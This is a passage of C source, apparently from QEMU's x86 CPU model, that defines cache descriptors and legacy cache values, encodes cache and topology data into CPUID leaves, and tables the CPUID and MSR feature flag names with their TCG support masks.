UNIFIED_CACHE, .size = 2 * MiB, .associativity = 16, .line_size = 64, }, [0xE3] = { .level = 3, .type = UNIFIED_CACHE, .size = 4 * MiB, .associativity = 16, .line_size = 64, }, [0xE4] = { .level = 3, .type = UNIFIED_CACHE, .size = 8 * MiB, .associativity = 16, .line_size = 64, }, [0xEA] = { .level = 3, .type = UNIFIED_CACHE, .size = 12 * MiB, .associativity = 24, .line_size = 64, }, [0xEB] = { .level = 3, .type = UNIFIED_CACHE, .size = 18 * MiB, .associativity = 24, .line_size = 64, }, [0xEC] = { .level = 3, .type = UNIFIED_CACHE, .size = 24 * MiB, .associativity = 24, .line_size = 64, }, }; /* * "CPUID leaf 2 does not report cache descriptor information, * use CPUID leaf 4 to query cache parameters" */ #define
CACHE_DESCRIPTOR_UNAVAILABLE 0xFF /* * Return a CPUID 2 cache descriptor for a given cache. * If no known descriptor is found, return CACHE_DESCRIPTOR_UNAVAILABLE */ static uint8_t cpuid2_cache_descriptor(CPUCacheInfo *cache) { int i; assert(cache->size > 0); assert(cache->level > 0); assert(cache->line_size > 0); assert(cache->associativity > 0); for (i = 0; i < ARRAY_SIZE(cpuid2_cache_descriptors); i++) { struct CPUID2CacheDescriptorInfo *d = &cpuid2_cache_descriptors[i]; if (d->level == cache->level && d->type == cache->type && d->size == cache->size && d->line_size == cache->line_size && d->associativity == cache->associativity) { return i; } } return CACHE_DESCRIPTOR_UNAVAILABLE; } /* CPUID Leaf 4 constants: */ /* EAX: */ #define CACHE_TYPE_D 1 #define CACHE_TYPE_I 2 #define CACHE_TYPE_UNIFIED 3 #define CACHE_LEVEL(l) (l << 5) #define CACHE_SELF_INIT_LEVEL (1 << 8) /* EDX: */ #define CACHE_NO_INVD_SHARING (1 << 0) #define CACHE_INCLUSIVE (1 << 1) #define CACHE_COMPLEX_IDX (1 << 2) /* Encode CacheType for CPUID[4].EAX */ #define CACHE_TYPE(t) (((t) == DATA_CACHE) ? CACHE_TYPE_D : \ ((t) == INSTRUCTION_CACHE) ? CACHE_TYPE_I : \ ((t) == UNIFIED_CACHE) ? CACHE_TYPE_UNIFIED : \ 0 /* Invalid value */) /* Encode cache info for CPUID[4] */ static void encode_cache_cpuid4(CPUCacheInfo *cache, int num_apic_ids, int num_cores, uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx) { assert(cache->size == cache->line_size * cache->associativity * cache->partitions * cache->sets); assert(num_apic_ids > 0); *eax = CACHE_TYPE(cache->type) | CACHE_LEVEL(cache->level) | (cache->self_init ? CACHE_SELF_INIT_LEVEL : 0) | ((num_cores - 1) << 26) | ((num_apic_ids - 1) << 14); assert(cache->line_size > 0); assert(cache->partitions > 0); assert(cache->associativity > 0); /* We don't implement fully-associative caches */ assert(cache->associativity < cache->sets); *ebx = (cache->line_size - 1) | ((cache->partitions - 1) << 12) | ((cache->associativity - 1) << 22); assert(cache->sets > 0); *ecx = cache->sets - 1; *edx = (cache->no_invd_sharing ? CACHE_NO_INVD_SHARING : 0) | (cache->inclusive ? CACHE_INCLUSIVE : 0) | (cache->complex_indexing ? CACHE_COMPLEX_IDX : 0); } /* Encode cache info for CPUID[0x80000005].ECX or CPUID[0x80000005].EDX */ static uint32_t encode_cache_cpuid80000005(CPUCacheInfo *cache) { assert(cache->size % 1024 == 0); assert(cache->lines_per_tag > 0); assert(cache->associativity > 0); assert(cache->line_size > 0); return ((cache->size / 1024) << 24) | (cache->associativity << 16) | (cache->lines_per_tag << 8) | (cache->line_size); } #define ASSOC_FULL 0xFF /* AMD associativity encoding used on CPUID Leaf 0x80000006: */ #define AMD_ENC_ASSOC(a) (a <= 1 ? a : \ a == 2 ? 0x2 : \ a == 4 ? 0x4 : \ a == 8 ? 0x6 : \ a == 16 ? 0x8 : \ a == 32 ? 0xA : \ a == 48 ? 0xB : \ a == 64 ? 0xC : \ a == 96 ? 0xD : \ a == 128 ? 0xE : \ a == ASSOC_FULL ? 0xF : \ 0 /* invalid value */) /* * Encode cache info for CPUID[0x80000006].ECX and CPUID[0x80000006].EDX * @l3 can be NULL. 
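* A worked example of the ECX packing implemented below, using the values of legacy_l2_cache_amd (512 KiB, 16-way, 64-byte lines, 1 line per tag): (512 << 16) | (AMD_ENC_ASSOC(16) << 12) | (1 << 8) | 64 == 0x02008140.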
*/ static void encode_cache_cpuid80000006(CPUCacheInfo *l2, CPUCacheInfo *l3, uint32_t *ecx, uint32_t *edx) { assert(l2->size % 1024 == 0); assert(l2->associativity > 0); assert(l2->lines_per_tag > 0); assert(l2->line_size > 0); *ecx = ((l2->size / 1024) << 16) | (AMD_ENC_ASSOC(l2->associativity) << 12) | (l2->lines_per_tag << 8) | (l2->line_size); if (l3) { assert(l3->size % (512 * 1024) == 0); assert(l3->associativity > 0); assert(l3->lines_per_tag > 0); assert(l3->line_size > 0); *edx = ((l3->size / (512 * 1024)) << 18) | (AMD_ENC_ASSOC(l3->associativity) << 12) | (l3->lines_per_tag << 8) | (l3->line_size); } else { *edx = 0; } } /* Encode cache info for CPUID[8000001D] */ static void encode_cache_cpuid8000001d(CPUCacheInfo *cache, X86CPUTopoInfo *topo_info, uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx) { uint32_t l3_cores; unsigned nodes = MAX(topo_info->nodes_per_pkg, 1); assert(cache->size == cache->line_size * cache->associativity * cache->partitions * cache->sets); *eax = CACHE_TYPE(cache->type) | CACHE_LEVEL(cache->level) | (cache->self_init ? CACHE_SELF_INIT_LEVEL : 0); /* L3 is shared among multiple cores */ if (cache->level == 3) { l3_cores = DIV_ROUND_UP((topo_info->dies_per_pkg * topo_info->cores_per_die * topo_info->threads_per_core), nodes); *eax |= (l3_cores - 1) << 14; } else { *eax |= ((topo_info->threads_per_core - 1) << 14); } assert(cache->line_size > 0); assert(cache->partitions > 0); assert(cache->associativity > 0); /* We don't implement fully-associative caches */ assert(cache->associativity < cache->sets); *ebx = (cache->line_size - 1) | ((cache->partitions - 1) << 12) | ((cache->associativity - 1) << 22); assert(cache->sets > 0); *ecx = cache->sets - 1; *edx = (cache->no_invd_sharing ? CACHE_NO_INVD_SHARING : 0) | (cache->inclusive ? CACHE_INCLUSIVE : 0) | (cache->complex_indexing ? CACHE_COMPLEX_IDX : 0); } /* Encode cache info for CPUID[8000001E] */ static void encode_topo_cpuid8000001e(X86CPUTopoInfo *topo_info, X86CPU *cpu, uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx) { X86CPUTopoIDs topo_ids = {0}; unsigned long nodes = MAX(topo_info->nodes_per_pkg, 1); int shift; x86_topo_ids_from_apicid_epyc(cpu->apic_id, topo_info, &topo_ids); *eax = cpu->apic_id; /* * CPUID_Fn8000001E_EBX * 31:16 Reserved * 15:8 Threads per core (The number of threads per core is * Threads per core + 1) * 7:0 Core id (see bit decoding below) * SMT: * 4:3 node id * 2 Core complex id * 1:0 Core id * Non SMT: * 5:4 node id * 3 Core complex id * 1:0 Core id */ *ebx = ((topo_info->threads_per_core - 1) << 8) | (topo_ids.node_id << 3) | (topo_ids.core_id); /* * CPUID_Fn8000001E_ECX * 31:11 Reserved * 10:8 Nodes per processor (Nodes per processor is number of nodes + 1) * 7:0 Node id (see bit decoding below) * 2 Socket id * 1:0 Node id */ if (nodes <= 4) { *ecx = ((nodes - 1) << 8) | (topo_ids.pkg_id << 2) | topo_ids.node_id; } else { /* * Node id fix up. Actual hardware supports up to 4 nodes. But with * more than 32 cores, we may end up with more than 4 nodes. * Node id is a combination of socket id and node id. The only * requirement here is that this number should be unique across the * system. * Shift the socket id to accommodate more nodes. We don't expect both * socket id and node id to be big numbers at the same time. This is not * an ideal config but we need to support it. Max nodes we can have * is 32 (255/8) with 8 cores per node and 255 max cores. We only need * 5 bits for nodes. Find the leftmost set bit to represent the total * number of nodes.
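* (Worked example: with 8 nodes, after nodes -= 1 we have 7 == 0b111, find_last_bit() returns 2, so the socket id below is shifted left by 3 and the low bits keep the node id.)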
find_last_bit returns last set bit(0 based). Left * shift(+1) the socket id to represent all the nodes. */ nodes -= 1; shift = find_last_bit(&nodes, 8); *ecx = (nodes << 8) | (topo_ids.pkg_id << (shift + 1)) | topo_ids.node_id; } *edx = 0; } /* * Definitions of the hardcoded cache entries we expose: * These are legacy cache values. If there is a need to change any * of these values please use builtin_x86_defs */ /* L1 data cache: */ static CPUCacheInfo legacy_l1d_cache = { .type = DATA_CACHE, .level = 1, .size = 32 * KiB, .self_init = 1, .line_size = 64, .associativity = 8, .sets = 64, .partitions = 1, .no_invd_sharing = true, }; /*FIXME: CPUID leaf 0x80000005 is inconsistent with leaves 2 & 4 */ static CPUCacheInfo legacy_l1d_cache_amd = { .type = DATA_CACHE, .level = 1, .size = 64 * KiB, .self_init = 1, .line_size = 64, .associativity = 2, .sets = 512, .partitions = 1, .lines_per_tag = 1, .no_invd_sharing = true, }; /* L1 instruction cache: */ static CPUCacheInfo legacy_l1i_cache = { .type = INSTRUCTION_CACHE, .level = 1, .size = 32 * KiB, .self_init = 1, .line_size = 64, .associativity = 8, .sets = 64, .partitions = 1, .no_invd_sharing = true, }; /*FIXME: CPUID leaf 0x80000005 is inconsistent with leaves 2 & 4 */ static CPUCacheInfo legacy_l1i_cache_amd = { .type = INSTRUCTION_CACHE, .level = 1, .size = 64 * KiB, .self_init = 1, .line_size = 64, .associativity = 2, .sets = 512, .partitions = 1, .lines_per_tag = 1, .no_invd_sharing = true, }; /* Level 2 unified cache: */ static CPUCacheInfo legacy_l2_cache = { .type = UNIFIED_CACHE, .level = 2, .size = 4 * MiB, .self_init = 1, .line_size = 64, .associativity = 16, .sets = 4096, .partitions = 1, .no_invd_sharing = true, }; /*FIXME: CPUID leaf 2 descriptor is inconsistent with CPUID leaf 4 */ static CPUCacheInfo legacy_l2_cache_cpuid2 = { .type = UNIFIED_CACHE, .level = 2, .size = 2 * MiB, .line_size = 64, .associativity = 8, }; /*FIXME: CPUID leaf 0x80000006 is inconsistent with leaves 2 & 4 */ static CPUCacheInfo legacy_l2_cache_amd = { .type = UNIFIED_CACHE, .level = 2, .size = 512 * KiB, .line_size = 64, .lines_per_tag = 1, .associativity = 16, .sets = 512, .partitions = 1, }; /* Level 3 unified cache: */ static CPUCacheInfo legacy_l3_cache = { .type = UNIFIED_CACHE, .level = 3, .size = 16 * MiB, .line_size = 64, .associativity = 16, .sets = 16384, .partitions = 1, .lines_per_tag = 1, .self_init = true, .inclusive = true, .complex_indexing = true, }; /* TLB definitions: */ #define L1_DTLB_2M_ASSOC 1 #define L1_DTLB_2M_ENTRIES 255 #define L1_DTLB_4K_ASSOC 1 #define L1_DTLB_4K_ENTRIES 255 #define L1_ITLB_2M_ASSOC 1 #define L1_ITLB_2M_ENTRIES 255 #define L1_ITLB_4K_ASSOC 1 #define L1_ITLB_4K_ENTRIES 255 #define L2_DTLB_2M_ASSOC 0 /* disabled */ #define L2_DTLB_2M_ENTRIES 0 /* disabled */ #define L2_DTLB_4K_ASSOC 4 #define L2_DTLB_4K_ENTRIES 512 #define L2_ITLB_2M_ASSOC 0 /* disabled */ #define L2_ITLB_2M_ENTRIES 0 /* disabled */ #define L2_ITLB_4K_ASSOC 4 #define L2_ITLB_4K_ENTRIES 512 /* CPUID Leaf 0x14 constants: */ #define INTEL_PT_MAX_SUBLEAF 0x1 /* * bit[00]: IA32_RTIT_CTL.CR3 filter can be set to 1 and IA32_RTIT_CR3_MATCH * MSR can be accessed; * bit[01]: Support Configurable PSB and Cycle-Accurate Mode; * bit[02]: Support IP Filtering, TraceStop filtering, and preservation * of Intel PT MSRs across warm reset; * bit[03]: Support MTC timing packet and suppression of COFI-based packets; */ #define INTEL_PT_MINIMAL_EBX 0xf /* * bit[00]: Tracing can be enabled with IA32_RTIT_CTL.ToPA = 1 and * IA32_RTIT_OUTPUT_BASE and 
IA32_RTIT_OUTPUT_MASK_PTRS MSRs can be * accessed; * bit[01]: ToPA tables can hold any number of output entries, up to the * maximum allowed by the MaskOrTableOffset field of * IA32_RTIT_OUTPUT_MASK_PTRS; * bit[02]: Support Single-Range Output scheme; */ #define INTEL_PT_MINIMAL_ECX 0x7 /* generated packets which contain IP payloads have LIP values */ #define INTEL_PT_IP_LIP (1 << 31) #define INTEL_PT_ADDR_RANGES_NUM 0x2 /* Number of configurable address ranges */ #define INTEL_PT_ADDR_RANGES_NUM_MASK 0x3 #define INTEL_PT_MTC_BITMAP (0x0249 << 16) /* Support ART(0,3,6,9) */ #define INTEL_PT_CYCLE_BITMAP 0x1fff /* Support 0,2^(0~11) */ #define INTEL_PT_PSB_BITMAP (0x003f << 16) /* Support 2K,4K,8K,16K,32K,64K */ #define I486_FEATURES (CPUID_FP87 | CPUID_VME | CPUID_PSE) #define PENTIUM_FEATURES (I486_FEATURES | CPUID_DE | CPUID_TSC | \ CPUID_MSR | CPUID_MCE | CPUID_CX8 | CPUID_MMX | CPUID_APIC) #define PENTIUM2_FEATURES (PENTIUM_FEATURES | CPUID_PAE | CPUID_SEP | \ CPUID_MTRR | CPUID_PGE | CPUID_MCA | CPUID_CMOV | CPUID_PAT | \ CPUID_PSE36 | CPUID_FXSR) #define PENTIUM3_FEATURES (PENTIUM2_FEATURES | CPUID_SSE) #define PPRO_FEATURES (CPUID_FP87 | CPUID_DE | CPUID_PSE | CPUID_TSC | \ CPUID_MSR | CPUID_MCE | CPUID_CX8 | CPUID_PGE | CPUID_CMOV | \ CPUID_PAT | CPUID_FXSR | CPUID_MMX | CPUID_SSE | CPUID_SSE2 | \ CPUID_PAE | CPUID_SEP | CPUID_APIC) #define TCG_FEATURES (CPUID_FP87 | CPUID_PSE | CPUID_TSC | CPUID_MSR | \ CPUID_PAE | CPUID_MCE | CPUID_CX8 | CPUID_APIC | CPUID_SEP | \ CPUID_MTRR | CPUID_PGE | CPUID_MCA | CPUID_CMOV | CPUID_PAT | \ CPUID_PSE36 | CPUID_CLFLUSH | CPUID_ACPI | CPUID_MMX | \ CPUID_FXSR | CPUID_SSE | CPUID_SSE2 | CPUID_SS | CPUID_DE) /* partly implemented: CPUID_MTRR, CPUID_MCA, CPUID_CLFLUSH (needed for Win64) */ /* missing: CPUID_VME, CPUID_DTS, CPUID_SS, CPUID_HT, CPUID_TM, CPUID_PBE */ #define TCG_EXT_FEATURES (CPUID_EXT_SSE3 | CPUID_EXT_PCLMULQDQ | \ CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | CPUID_EXT_CX16 | \ CPUID_EXT_SSE41 | CPUID_EXT_SSE42 | CPUID_EXT_POPCNT | \ CPUID_EXT_XSAVE | /* CPUID_EXT_OSXSAVE is dynamic */ \ CPUID_EXT_MOVBE | CPUID_EXT_AES | CPUID_EXT_HYPERVISOR | \ CPUID_EXT_RDRAND) /* missing: CPUID_EXT_DTES64, CPUID_EXT_DSCPL, CPUID_EXT_VMX, CPUID_EXT_SMX, CPUID_EXT_EST, CPUID_EXT_TM2, CPUID_EXT_CID, CPUID_EXT_FMA, CPUID_EXT_XTPR, CPUID_EXT_PDCM, CPUID_EXT_PCID, CPUID_EXT_DCA, CPUID_EXT_X2APIC, CPUID_EXT_TSC_DEADLINE_TIMER, CPUID_EXT_AVX, CPUID_EXT_F16C */ #ifdef TARGET_X86_64 #define TCG_EXT2_X86_64_FEATURES (CPUID_EXT2_SYSCALL | CPUID_EXT2_LM) #else #define TCG_EXT2_X86_64_FEATURES 0 #endif #define TCG_EXT2_FEATURES ((TCG_FEATURES & CPUID_EXT2_AMD_ALIASES) | \ CPUID_EXT2_NX | CPUID_EXT2_MMXEXT | CPUID_EXT2_RDTSCP | \ CPUID_EXT2_3DNOW | CPUID_EXT2_3DNOWEXT | CPUID_EXT2_PDPE1GB | \ TCG_EXT2_X86_64_FEATURES) #define TCG_EXT3_FEATURES (CPUID_EXT3_LAHF_LM | CPUID_EXT3_SVM | \ CPUID_EXT3_CR8LEG | CPUID_EXT3_ABM | CPUID_EXT3_SSE4A) #define TCG_EXT4_FEATURES 0 #define TCG_SVM_FEATURES CPUID_SVM_NPT #define TCG_KVM_FEATURES 0 #define TCG_7_0_EBX_FEATURES (CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_SMAP | \ CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ADX | \ CPUID_7_0_EBX_PCOMMIT | CPUID_7_0_EBX_CLFLUSHOPT | \ CPUID_7_0_EBX_CLWB | CPUID_7_0_EBX_MPX | CPUID_7_0_EBX_FSGSBASE | \ CPUID_7_0_EBX_ERMS) /* missing: CPUID_7_0_EBX_HLE, CPUID_7_0_EBX_AVX2, CPUID_7_0_EBX_INVPCID, CPUID_7_0_EBX_RTM, CPUID_7_0_EBX_RDSEED */ #define TCG_7_0_ECX_FEATURES (CPUID_7_0_ECX_PKU | \ /* CPUID_7_0_ECX_OSPKE is dynamic */ \ CPUID_7_0_ECX_LA57) #define TCG_7_0_EDX_FEATURES 0 #define 
TCG_7_1_EAX_FEATURES 0 #define TCG_APM_FEATURES 0 #define TCG_6_EAX_FEATURES CPUID_6_EAX_ARAT #define TCG_XSAVE_FEATURES (CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XGETBV1) /* missing: CPUID_XSAVE_XSAVEC, CPUID_XSAVE_XSAVES */ typedef enum FeatureWordType { CPUID_FEATURE_WORD, MSR_FEATURE_WORD, } FeatureWordType; typedef struct FeatureWordInfo { FeatureWordType type; /* feature flags names are taken from "Intel Processor Identification and * the CPUID Instruction" and AMD's "CPUID Specification". * In cases of disagreement between feature naming conventions, * aliases may be added. */ const char *feat_names[64]; union { /* If type==CPUID_FEATURE_WORD */ struct { uint32_t eax; /* Input EAX for CPUID */ bool needs_ecx; /* CPUID instruction uses ECX as input */ uint32_t ecx; /* Input ECX value for CPUID */ int reg; /* output register (R_* constant) */ } cpuid; /* If type==MSR_FEATURE_WORD */ struct { uint32_t index; } msr; }; uint64_t tcg_features; /* Feature flags supported by TCG */ /* Features that shouldn't be auto-enabled by "-cpu host" */ uint64_t no_autoenable_flags; } FeatureWordInfo; static FeatureWordInfo feature_word_info[FEATURE_WORDS] = { [FEAT_1_EDX] = { .type = CPUID_FEATURE_WORD, .feat_names = { "fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8", "apic", NULL, "sep", "mtrr", "pge", "mca", "cmov", "pat", "pse36", "pn" /* Intel psn */, "clflush" /* Intel clfsh */, NULL, "ds" /* Intel dts */, "acpi", "mmx", "fxsr", "sse", "sse2", "ss", "ht" /* Intel htt */, "tm", "ia64", "pbe", }, .cpuid = {.eax = 1, .reg = R_EDX, }, .tcg_features = TCG_FEATURES, }, [FEAT_1_ECX] = { .type = CPUID_FEATURE_WORD, .feat_names = { "pni" /* Intel,AMD sse3 */, "pclmulqdq", "dtes64", "monitor", "ds-cpl", "vmx", "smx", "est", "tm2", "ssse3", "cid", NULL, "fma", "cx16", "xtpr", "pdcm", NULL, "pcid", "dca", "sse4.1", "sse4.2", "x2apic", "movbe", "popcnt", "tsc-deadline", "aes", "xsave", NULL /* osxsave */, "avx", "f16c", "rdrand", "hypervisor", }, .cpuid = { .eax = 1, .reg = R_ECX, }, .tcg_features = TCG_EXT_FEATURES, }, /* Feature names that are already defined on feature_name[] but * are set on CPUID[8000_0001].EDX on AMD CPUs don't have their * names on feat_names below. They are copied automatically * to features[FEAT_8000_0001_EDX] if and only if CPU vendor is AMD. */ [FEAT_8000_0001_EDX] = { .type = CPUID_FEATURE_WORD, .feat_names = { NULL /* fpu */, NULL /* vme */, NULL /* de */, NULL /* pse */, NULL /* tsc */, NULL /* msr */, NULL /* pae */, NULL /* mce */, NULL /* cx8 */, NULL /* apic */, NULL, "syscall", NULL /* mtrr */, NULL /* pge */, NULL /* mca */, NULL /* cmov */, NULL /* pat */, NULL /* pse36 */, NULL, NULL /* Linux mp */, "nx", NULL, "mmxext", NULL /* mmx */, NULL /* fxsr */, "fxsr-opt", "pdpe1gb", "rdtscp", NULL, "lm", "3dnowext", "3dnow", }, .cpuid = { .eax = 0x80000001, .reg = R_EDX, }, .tcg_features = TCG_EXT2_FEATURES, }, [FEAT_8000_0001_ECX] = { .type = CPUID_FEATURE_WORD, .feat_names = { "lahf-lm", "cmp-legacy", "svm", "extapic", "cr8legacy", "abm", "sse4a", "misalignsse", "3dnowprefetch", "osvw", "ibs", "xop", "skinit", "wdt", NULL, "lwp", "fma4", "tce", NULL, "nodeid-msr", NULL, "tbm", "topoext", "perfctr-core", "perfctr-nb", NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 0x80000001, .reg = R_ECX, }, .tcg_features = TCG_EXT3_FEATURES, /* * TOPOEXT is always allowed but can't be enabled blindly by * "-cpu host", as it requires consistent cache topology info * to be provided so it doesn't confuse guests. 
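* Flags listed in no_autoenable_flags can still be turned on explicitly on the command line (e.g. "-cpu host,+topoext"); they are only excluded from the implicit "-cpu host" set.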
*/ .no_autoenable_flags = CPUID_EXT3_TOPOEXT, }, [FEAT_C000_0001_EDX] = { .type = CPUID_FEATURE_WORD, .feat_names = { NULL, NULL, "xstore", "xstore-en", NULL, NULL, "xcrypt", "xcrypt-en", "ace2", "ace2-en", "phe", "phe-en", "pmm", "pmm-en", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 0xC0000001, .reg = R_EDX, }, .tcg_features = TCG_EXT4_FEATURES, }, [FEAT_HV_RECOMM_EAX] = { .type = CPUID_FEATURE_WORD, .feat_names = { NULL /* hv_recommend_pv_as_switch */, NULL /* hv_recommend_pv_tlbflush_local */, NULL /* hv_recommend_pv_tlbflush_remote */, NULL /* hv_recommend_msr_apic_access */, NULL /* hv_recommend_msr_reset */, NULL /* hv_recommend_relaxed_timing */, NULL /* hv_recommend_dma_remapping */, NULL /* hv_recommend_int_remapping */, NULL /* hv_recommend_x2apic_msrs */, NULL /* hv_recommend_autoeoi_deprecation */, NULL /* hv_recommend_pv_ipi */, NULL /* hv_recommend_ex_hypercalls */, NULL /* hv_hypervisor_is_nested */, NULL /* hv_recommend_int_mbec */, NULL /* hv_recommend_evmcs */, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 0x40000004, .reg = R_EAX, }, }, [FEAT_HV_NESTED_EAX] = { .type = CPUID_FEATURE_WORD, .cpuid = { .eax = 0x4000000A, .reg = R_EAX, }, }, [FEAT_SVM] = { .type = CPUID_FEATURE_WORD, .feat_names = { "npt", "lbrv", "svm-lock", "nrip-save", "tsc-scale", "vmcb-clean", "flushbyasid", "decodeassists", NULL, NULL, "pause-filter", NULL, "pfthreshold", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 0x8000000A, .reg = R_EDX, }, .tcg_features = TCG_SVM_FEATURES, }, [FEAT_7_0_EBX] = { .type = CPUID_FEATURE_WORD, .feat_names = { "fsgsbase", "tsc-adjust", NULL, "bmi1", "hle", "avx2", NULL, "smep", "bmi2", "erms", "invpcid", "rtm", NULL, NULL, "mpx", NULL, "avx512f", "avx512dq", "rdseed", "adx", "smap", "avx512ifma", "pcommit", "clflushopt", "clwb", "intel-pt", "avx512pf", "avx512er", "avx512cd", "sha-ni", "avx512bw", "avx512vl", }, .cpuid = { .eax = 7, .needs_ecx = true, .ecx = 0, .reg = R_EBX, }, .tcg_features = TCG_7_0_EBX_FEATURES, }, [FEAT_7_0_ECX] = { .type = CPUID_FEATURE_WORD, .feat_names = { NULL, "avx512vbmi", "umip", "pku", NULL /* ospke */, "waitpkg", "avx512vbmi2", NULL, "gfni", "vaes", "vpclmulqdq", "avx512vnni", "avx512bitalg", NULL, "avx512-vpopcntdq", NULL, "la57", NULL, NULL, NULL, NULL, NULL, "rdpid", NULL, NULL, "cldemote", NULL, "movdiri", "movdir64b", NULL, NULL, NULL, }, .cpuid = { .eax = 7, .needs_ecx = true, .ecx = 0, .reg = R_ECX, }, .tcg_features = TCG_7_0_ECX_FEATURES, }, [FEAT_7_0_EDX] = { .type = CPUID_FEATURE_WORD, .feat_names = { NULL, NULL, "avx512-4vnniw", "avx512-4fmaps", NULL, NULL, NULL, NULL, NULL, NULL, "md-clear", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL /* pconfig */, NULL, NULL, NULL, NULL, NULL, NULL, NULL, "spec-ctrl", "stibp", NULL, "arch-capabilities", "core-capability", "ssbd", }, .cpuid = { .eax = 7, .needs_ecx = true, .ecx = 0, .reg = R_EDX, }, .tcg_features = TCG_7_0_EDX_FEATURES, }, [FEAT_7_1_EAX] = { .type = CPUID_FEATURE_WORD, .feat_names = { NULL, NULL, NULL, NULL, NULL, "avx512-bf16", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 7, .needs_ecx = true, .ecx = 1, .reg = R_EAX, }, .tcg_features = TCG_7_1_EAX_FEATURES, }, [FEAT_8000_0007_EDX] = { .type = 
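/* CPUID 0x80000007 EDX, the AMD advanced power management leaf; only invtsc is given a name below */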
CPUID_FEATURE_WORD, .feat_names = { NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, "invtsc", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 0x80000007, .reg = R_EDX, }, .tcg_features = TCG_APM_FEATURES, }, [FEAT_8000_0008_EBX] = { .type = CPUID_FEATURE_WORD, .feat_names = { "clzero", NULL, "xsaveerptr", NULL, NULL, NULL, NULL, NULL, NULL, "wbnoinvd", NULL, NULL, "ibpb", NULL, NULL, "amd-stibp", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, "amd-ssbd", "virt-ssbd", "amd-no-ssb", NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 0x80000008, .reg = R_EBX, }, .tcg_features = 0, }, [FEAT_XSAVE] = { .type = CPUID_FEATURE_WORD, .feat_names = { "xsaveopt", "xsavec", "xgetbv1", "xsaves", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 0xd, .needs_ecx = true, .ecx = 1, .reg = R_EAX, }, .tcg_features = TCG_XSAVE_FEATURES, }, [FEAT_6_EAX] = { .type = CPUID_FEATURE_WORD, .feat_names = { NULL, NULL, "arat", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 6, .reg = R_EAX, }, .tcg_features = TCG_6_EAX_FEATURES, }, [FEAT_XSAVE_COMP_LO] = { .type = CPUID_FEATURE_WORD, .cpuid = { .eax = 0xD, .needs_ecx = true, .ecx = 0, .reg = R_EAX, }, .tcg_features = ~0U, }, [FEAT_XSAVE_COMP_HI] = { .type = CPUID_FEATURE_WORD, .cpuid = { .eax = 0xD, .needs_ecx = true, .ecx = 0, .reg = R_EDX, }, .tcg_features = ~0U, }, /*Below are MSR exposed features*/ [FEAT_ARCH_CAPABILITIES] = { .type = MSR_FEATURE_WORD, .feat_names = { "rdctl-no", "ibrs-all", "rsba", "skip-l1dfl-vmentry", "ssb-no", "mds-no", "pschange-mc-no", "tsx-ctrl", "taa-no", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .msr = { .index = MSR_IA32_ARCH_CAPABILITIES, }, }, [FEAT_CORE_CAPABILITY] = { .type = MSR_FEATURE_WORD, .feat_names = { NULL, NULL, NULL, NULL, NULL, "split-lock-detect", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .msr = { .index = MSR_IA32_CORE_CAPABILITY, }, }, [FEAT_VMX_PROCBASED_CTLS] = { .type = MSR_FEATURE_WORD, .feat_names = { NULL, NULL, "vmx-vintr-pending", "vmx-tsc-offset", NULL, NULL, NULL, "vmx-hlt-exit", NULL, "vmx-invlpg-exit", "vmx-mwait-exit", "vmx-rdpmc-exit", "vmx-rdtsc-exit", NULL, NULL, "vmx-cr3-load-noexit", "vmx-cr3-store-noexit", NULL, NULL, "vmx-cr8-load-exit", "vmx-cr8-store-exit", "vmx-flexpriority", "vmx-vnmi-pending", "vmx-movdr-exit", "vmx-io-exit", "vmx-io-bitmap", NULL, "vmx-mtf", "vmx-msr-bitmap", "vmx-monitor-exit", "vmx-pause-exit", "vmx-secondary-ctls", }, .msr = { .index = MSR_IA32_VMX_TRUE_PROCBASED_CTLS, } }, [FEAT_VMX_SECONDARY_CTLS] = { .type = MSR_FEATURE_WORD, .feat_names = { "vmx-apicv-xapic", "vmx-ept", "vmx-desc-exit", "vmx-rdtscp-exit", "vmx-apicv-x2apic", "vmx-vpid", "vmx-wbinvd-exit", "vmx-unrestricted-guest", "vmx-apicv-register", "vmx-apicv-vid", "vmx-ple", "vmx-rdrand-exit", "vmx-invpcid-exit", 